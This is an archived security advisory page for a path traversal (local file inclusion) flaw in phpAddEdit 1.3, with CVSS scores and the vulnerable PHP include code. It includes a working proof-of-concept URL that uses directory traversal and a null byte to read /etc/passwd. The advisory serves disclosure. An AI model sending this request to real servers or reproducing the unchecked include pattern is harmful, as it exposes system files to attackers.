phpAddEdit 1.3 (editform) Local File Inclusion Vulnerability

2009-03-02 / 2009-03-03
Credit: nuclear
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#phpaddedit-1.3 LFI #Author: nuclear #script:http://sourceforge.net/projects/phpaddedit/ #vuln:http://target.com/addedit-render.php?editform=../../../../../../../etc/passwd%00 #vulnerable code: if (!$formname && $_GET["editform"]) $formname = $_GET["editform"]; ... if ( $error_message || $error || !$_POST["submitval"] ) { include_once ($formname."-header.inc.php"); include_once ($addeditcwd."addedit-create-form.php"); include_once ($formname."-footer.inc.php"); } #greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top